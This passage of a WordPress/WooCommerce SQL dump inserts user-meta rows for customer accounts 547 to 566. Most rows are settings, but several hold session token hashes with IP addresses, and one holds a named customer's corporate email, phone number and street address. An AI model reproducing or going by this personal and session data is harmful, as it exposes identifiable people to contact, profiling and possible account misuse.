INSERT INTO `wp_usermeta` VALUES (9014, 547, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9015, 547, '_yoast_wpseo_profile_updated', '1489622207'); 
INSERT INTO `wp_usermeta` VALUES (9016, 547, 'session_tokens', 'a:1:{s:64:"7e30722bcbaf6b98f800de941ffce39f2cecd5a68d245447e190b9a7d2b9def2";a:4:{s:10:"expiration";i:1490831816;s:2:"ip";s:13:"203.27.186.34";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0";s:5:"login";i:1489622216;}}'); 
INSERT INTO `wp_usermeta` VALUES (9017, 547, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9018, 548, 'nickname', 'david.f.padilla'); 
INSERT INTO `wp_usermeta` VALUES (9019, 548, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9020, 548, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9021, 548, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9022, 548, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9023, 548, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9024, 548, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9025, 548, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9026, 548, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9027, 548, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9028, 548, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9029, 548, '_yoast_wpseo_profile_updated', '1489673423'); 
INSERT INTO `wp_usermeta` VALUES (9030, 548, 'session_tokens', 'a:1:{s:64:"1323156ced32a287582056a06f9ebc5b5c08a0f396937f1adc4a5471f15eb152";a:4:{s:10:"expiration";i:1490883031;s:2:"ip";s:12:"216.75.211.8";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1489673431;}}'); 
INSERT INTO `wp_usermeta` VALUES (9031, 548, 'billing_first_name', 'David'); 
INSERT INTO `wp_usermeta` VALUES (9032, 548, 'billing_last_name', 'Padilla'); 
INSERT INTO `wp_usermeta` VALUES (9033, 548, 'billing_company', 'Medtronic'); 
INSERT INTO `wp_usermeta` VALUES (9034, 548, 'billing_email', 'david.f.padilla@medtronic.com'); 
INSERT INTO `wp_usermeta` VALUES (9035, 548, 'billing_phone', '317 837-8749'); 
INSERT INTO `wp_usermeta` VALUES (9036, 548, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (9037, 548, 'billing_address_1', '2824 Airwest BLvd'); 
INSERT INTO `wp_usermeta` VALUES (9038, 548, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (9039, 548, 'billing_city', 'Plainfield'); 
INSERT INTO `wp_usermeta` VALUES (9040, 548, 'billing_state', 'IN'); 
INSERT INTO `wp_usermeta` VALUES (9041, 548, 'billing_postcode', '46168'); 
INSERT INTO `wp_usermeta` VALUES (9042, 549, 'nickname', 'Carl.Bergeron-Bernier'); 
INSERT INTO `wp_usermeta` VALUES (9043, 549, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9044, 549, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9045, 549, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9046, 549, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9047, 549, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9048, 549, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9049, 549, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9050, 549, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9051, 549, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9052, 549, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9053, 549, '_yoast_wpseo_profile_updated', '1489674540'); 
INSERT INTO `wp_usermeta` VALUES (9054, 549, 'session_tokens', 'a:2:{s:64:"9db15783d42f792f6323c5a849b652eb600fc6dec3378d8122f94fd28d0d0263";a:4:{s:10:"expiration";i:1490884149;s:2:"ip";s:15:"131.137.245.209";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1489674549;}s:64:"95b90fde6079c618d011424f2d987e03c6c9d8ec1cd05492bbf60eaa81024da2";a:4:{s:10:"expiration";i:1489847360;s:2:"ip";s:15:"131.137.245.209";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1489674560;}}'); 
INSERT INTO `wp_usermeta` VALUES (9055, 550, 'nickname', 'kenneth.bowen'); 
INSERT INTO `wp_usermeta` VALUES (9056, 550, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9057, 550, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9058, 550, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9059, 550, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9060, 550, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9061, 550, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9062, 550, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9063, 550, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9064, 550, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9065, 550, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9066, 550, '_yoast_wpseo_profile_updated', '1489678045'); 
INSERT INTO `wp_usermeta` VALUES (9067, 550, 'session_tokens', 'a:1:{s:64:"61c47c4da3f360f52dc7eac2c6c0cad5c5944378b8ec0fd7e4def035f6fdc9a7";a:4:{s:10:"expiration";i:1490887654;s:2:"ip";s:14:"209.194.18.149";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1489678054;}}'); 
INSERT INTO `wp_usermeta` VALUES (9068, 550, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9069, 551, 'nickname', 'agallo1'); 
INSERT INTO `wp_usermeta` VALUES (9070, 551, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9071, 551, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9072, 551, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9073, 551, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9074, 551, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9075, 551, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9076, 551, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9077, 551, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9078, 551, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9079, 551, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9080, 551, '_yoast_wpseo_profile_updated', '1489681272'); 
INSERT INTO `wp_usermeta` VALUES (9081, 551, 'session_tokens', 'a:1:{s:64:"39ac39a29a14d5a7ff29bb37bd32b6282c8def5017d2ec20ff134257376dfa10";a:4:{s:10:"expiration";i:1490890882;s:2:"ip";s:15:"108.171.135.167";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1489681282;}}'); 
INSERT INTO `wp_usermeta` VALUES (9082, 552, 'nickname', 'mkinne'); 
INSERT INTO `wp_usermeta` VALUES (9083, 552, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9084, 552, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9085, 552, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9086, 552, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9087, 552, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9088, 552, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9089, 552, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9090, 552, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9091, 552, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9092, 552, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9093, 552, '_yoast_wpseo_profile_updated', '1489685783'); 
INSERT INTO `wp_usermeta` VALUES (9095, 553, 'nickname', 'whitea'); 
INSERT INTO `wp_usermeta` VALUES (9096, 553, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9097, 553, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9098, 553, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9099, 553, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9100, 553, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9101, 553, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9102, 553, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9103, 553, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9104, 553, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9105, 553, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9106, 553, '_yoast_wpseo_profile_updated', '1489707777'); 
INSERT INTO `wp_usermeta` VALUES (9107, 553, 'session_tokens', 'a:1:{s:64:"8f1db8d7b0f6ebe2ae897d66fca2e097d1adfcfd905563ba24aa772f303531dc";a:4:{s:10:"expiration";i:1490917388;s:2:"ip";s:12:"97.64.131.66";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1489707788;}}'); 
INSERT INTO `wp_usermeta` VALUES (9108, 554, 'nickname', 'janettahunaiz3208'); 
INSERT INTO `wp_usermeta` VALUES (9109, 554, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9110, 554, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9111, 554, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9112, 554, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9113, 554, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9114, 554, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9115, 554, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9116, 554, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9117, 554, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9118, 554, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9119, 554, '_yoast_wpseo_profile_updated', '1489716110'); 
INSERT INTO `wp_usermeta` VALUES (9120, 554, 'session_tokens', 'a:1:{s:64:"d3522228ff3d0d82d3ab662620cb437e91298d06628f38e8d35d373de7f4a832";a:4:{s:10:"expiration";i:1490925720;s:2:"ip";s:14:"107.150.64.123";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1489716120;}}'); 
INSERT INTO `wp_usermeta` VALUES (9121, 554, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9122, 555, 'nickname', 'john.r.knox'); 
INSERT INTO `wp_usermeta` VALUES (9123, 555, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9124, 555, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9125, 555, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9126, 555, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9127, 555, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9128, 555, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9129, 555, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9130, 555, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9131, 555, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9132, 555, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9133, 555, '_yoast_wpseo_profile_updated', '1489756264'); 
INSERT INTO `wp_usermeta` VALUES (9134, 555, 'session_tokens', 'a:1:{s:64:"32de1ae469befb1cd88817f532416af08db3690e19beaaffcfb1dd3a8cbb396d";a:4:{s:10:"expiration";i:1490965876;s:2:"ip";s:12:"216.81.94.75";s:2:"ua";s:127:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586";s:5:"login";i:1489756276;}}'); 
INSERT INTO `wp_usermeta` VALUES (9135, 556, 'nickname', 'QC'); 
INSERT INTO `wp_usermeta` VALUES (9136, 556, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9137, 556, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9138, 556, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9139, 556, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9140, 556, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9141, 556, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9142, 556, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9143, 556, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9144, 556, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9145, 556, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9146, 556, '_yoast_wpseo_profile_updated', '1489760308'); 
INSERT INTO `wp_usermeta` VALUES (9147, 556, 'session_tokens', 'a:1:{s:64:"768203b938a3b07ce278cd143cc89fa24584b78618dd9946727f74b6ad26f5c8";a:4:{s:10:"expiration";i:1491147482;s:2:"ip";s:14:"75.144.125.178";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0";s:5:"login";i:1490974682;}}'); 
INSERT INTO `wp_usermeta` VALUES (9148, 557, 'nickname', 'astridbickneseeb0337'); 
INSERT INTO `wp_usermeta` VALUES (9149, 557, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9150, 557, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9151, 557, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9152, 557, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9153, 557, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9154, 557, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9155, 557, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9156, 557, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9157, 557, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9158, 557, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9159, 557, '_yoast_wpseo_profile_updated', '1489775116'); 
INSERT INTO `wp_usermeta` VALUES (9160, 557, 'session_tokens', 'a:1:{s:64:"2d322ce5af2b9a09780fcb324271474135dbc6850f044bc63e21ef29fa7b24fc";a:4:{s:10:"expiration";i:1490984726;s:2:"ip";s:14:"165.231.103.55";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1489775126;}}'); 
INSERT INTO `wp_usermeta` VALUES (9161, 557, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9162, 558, 'nickname', 'tonya.fenwick'); 
INSERT INTO `wp_usermeta` VALUES (9163, 558, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9164, 558, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9165, 558, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9166, 558, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9167, 558, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9168, 558, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9169, 558, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9170, 558, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9171, 558, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9172, 558, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9173, 558, '_yoast_wpseo_profile_updated', '1489777414'); 
INSERT INTO `wp_usermeta` VALUES (9174, 558, 'session_tokens', 'a:1:{s:64:"3e33c59dff911c41b1807a8f558235ff8b06a2bd5467fbab88e27fddd1be3bb2";a:4:{s:10:"expiration";i:1490987022;s:2:"ip";s:13:"50.203.46.130";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1489777422;}}'); 
INSERT INTO `wp_usermeta` VALUES (9175, 558, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9176, 559, 'nickname', 'todd.troutman'); 
INSERT INTO `wp_usermeta` VALUES (9177, 559, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9178, 559, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9179, 559, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9180, 559, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9181, 559, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9182, 559, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9183, 559, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9184, 559, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9185, 559, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9186, 559, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9187, 559, '_yoast_wpseo_profile_updated', '1490011406'); 
INSERT INTO `wp_usermeta` VALUES (9188, 559, 'session_tokens', 'a:1:{s:64:"1ce1bfcd9d561d7fecf44d8141f4a2f1b6813fe4060a56cbb66032dd33f012ec";a:4:{s:10:"expiration";i:1491221015;s:2:"ip";s:15:"199.168.151.108";s:2:"ua";s:127:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586";s:5:"login";i:1490011415;}}'); 
INSERT INTO `wp_usermeta` VALUES (9189, 560, 'nickname', 'lddiehl'); 
INSERT INTO `wp_usermeta` VALUES (9190, 560, 'first_name', 'Lonnie'); 
INSERT INTO `wp_usermeta` VALUES (9191, 560, 'last_name', 'Diehl'); 
INSERT INTO `wp_usermeta` VALUES (9192, 560, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9193, 560, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9194, 560, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9195, 560, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9196, 560, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9197, 560, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9198, 560, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9199, 560, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9200, 560, '_yoast_wpseo_profile_updated', '1490015541'); 
INSERT INTO `wp_usermeta` VALUES (9201, 560, 'session_tokens', 'a:1:{s:64:"e65f49ea9f5a6b28cbe330967fde248ec3e760fd34340820ed045c47007ec28b";a:4:{s:10:"expiration";i:1491225152;s:2:"ip";s:15:"198.102.155.100";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0";s:5:"login";i:1490015552;}}'); 
INSERT INTO `wp_usermeta` VALUES (9202, 560, 'last_update', '1490015597'); 
INSERT INTO `wp_usermeta` VALUES (9203, 561, 'nickname', 'akaczma'); 
INSERT INTO `wp_usermeta` VALUES (9204, 561, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9205, 561, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9206, 561, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9207, 561, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9208, 561, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9209, 561, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9210, 561, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9211, 561, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9212, 561, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9213, 561, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9214, 561, '_yoast_wpseo_profile_updated', '1490023057'); 
INSERT INTO `wp_usermeta` VALUES (9215, 561, 'session_tokens', 'a:1:{s:64:"3aaea3e63b271f74b3965fc4801a5148c625cd59b1955d790be5623fd4337c95";a:4:{s:10:"expiration";i:1495915064;s:2:"ip";s:15:"198.102.155.100";s:2:"ua";s:117:"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5";s:5:"login";i:1495742264;}}'); 
INSERT INTO `wp_usermeta` VALUES (9216, 562, 'nickname', 'carlos.costa'); 
INSERT INTO `wp_usermeta` VALUES (9217, 562, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9218, 562, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9219, 562, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9220, 562, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9221, 562, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9222, 562, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9223, 562, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9224, 562, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9225, 562, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9226, 562, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9227, 562, '_yoast_wpseo_profile_updated', '1490089398'); 
INSERT INTO `wp_usermeta` VALUES (9228, 562, 'session_tokens', 'a:1:{s:64:"222232c32f874535148c41fc26e5c84a3f8403b60ab7e88ee2dfb5c146f15744";a:4:{s:10:"expiration";i:1491299014;s:2:"ip";s:13:"213.78.107.59";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0";s:5:"login";i:1490089414;}}'); 
INSERT INTO `wp_usermeta` VALUES (9229, 563, 'nickname', 'diana.dereje.ctr'); 
INSERT INTO `wp_usermeta` VALUES (9230, 563, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9231, 563, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9232, 563, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9233, 563, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9234, 563, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9235, 563, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9236, 563, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9237, 563, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9238, 563, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9239, 563, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9240, 563, '_yoast_wpseo_profile_updated', '1490097676'); 
INSERT INTO `wp_usermeta` VALUES (9241, 563, 'session_tokens', 'a:1:{s:64:"cb1c3158cbf3e48a139a9f9e17a3b35aebd3ccbf3233d386df2cb691a698908e";a:4:{s:10:"expiration";i:1491307287;s:2:"ip";s:12:"138.162.0.41";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490097687;}}'); 
INSERT INTO `wp_usermeta` VALUES (9242, 564, 'nickname', 'judier.soto'); 
INSERT INTO `wp_usermeta` VALUES (9243, 564, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9244, 564, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9245, 564, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9246, 564, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9247, 564, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9248, 564, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9249, 564, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9250, 564, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9251, 564, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9252, 564, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9253, 564, '_yoast_wpseo_profile_updated', '1490107503'); 
INSERT INTO `wp_usermeta` VALUES (9254, 564, 'session_tokens', 'a:1:{s:64:"188514ccb4cb17b3e739db3a3af6df18b6b54d9227d2a67b38837ed68b142e45";a:4:{s:10:"expiration";i:1491317113;s:2:"ip";s:13:"15.203.233.81";s:2:"ua";s:128:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393";s:5:"login";i:1490107513;}}'); 
INSERT INTO `wp_usermeta` VALUES (9255, 565, 'nickname', 'jose.a.mena1'); 
INSERT INTO `wp_usermeta` VALUES (9256, 565, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9257, 565, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9258, 565, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9259, 565, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9260, 565, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9261, 565, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9262, 565, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9263, 565, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9264, 565, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9265, 565, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9266, 565, '_yoast_wpseo_profile_updated', '1490151116'); 
INSERT INTO `wp_usermeta` VALUES (9267, 565, 'session_tokens', 'a:1:{s:64:"36af64bef49278ea01bacfad23395b2ee41d08f794c6f87a1cd574ac286c7369";a:4:{s:10:"expiration";i:1491360724;s:2:"ip";s:12:"138.163.0.42";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490151124;}}'); 
INSERT INTO `wp_usermeta` VALUES (9268, 566, 'nickname', 'reyesjvivas'); 
INSERT INTO `wp_usermeta` VALUES (9269, 566, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9270, 566, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9271, 566, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9272, 566, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9273, 566, 'comment_shortcuts', 'false'); 
